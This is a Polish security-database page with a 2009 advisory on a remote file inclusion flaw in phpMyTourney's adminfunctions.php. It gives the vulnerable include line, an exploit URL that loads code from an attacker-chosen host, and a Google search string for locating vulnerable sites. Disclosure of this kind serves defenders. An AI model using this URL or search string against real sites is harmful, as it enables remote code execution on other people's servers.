Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
WLB
Audyt
RSS
Zespół
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl

Strona główna arrow Baza WLB          

  Tytuł : phpMyTourney adminfunctions.php Remote File Include Vulnerabilities
  WLB : WLB-2009060046  (Szczegóły)
  Data publikacji : 2009-06-17
  Autor          : IrIsT
  Poziom ryzyka : Wysoki  Poziom Wysoki  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Nie
  Status   : Bład

  Historia :
[2009-06-17] Publikacja

  Podatne oprogramowanie :  

phpMyTourney adminfunctions.php


  Tekst :  

...a bug in phpMyTourney that allows to us to occur a Remote File Include
on a Remote machin.

Bug :

#
#
# Islamic Republic Of Iran Security Team
#
#
#
# Www.IrIsT.Ir
#
#
#
#
#
# phpMyTourney adminfunctions.php Remote File Include Vulnerabilities
#
#
#
# Download......: http:/phpmytourney.sourceforge.net
#
#
#
# file;
#
# dminfunctions.php
#
#
#
# bug;
#
#
#
# include($functions_file);
#
#
#
# Exploit...:
http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]? #
#
#
# Bug Found.....: IrIsT
#
#
#
# discovery.....: Am!r (IrIsT)
#
#
#
# contact.......: IrIsT.Ir[at]Gmail.Com
#
#
#
# Google Search.: "Powered By phpMyTourney"
#
#
#


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP


Apache rss
PHP rss
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain

Copyright © SecurityReason. All Rights Reserved.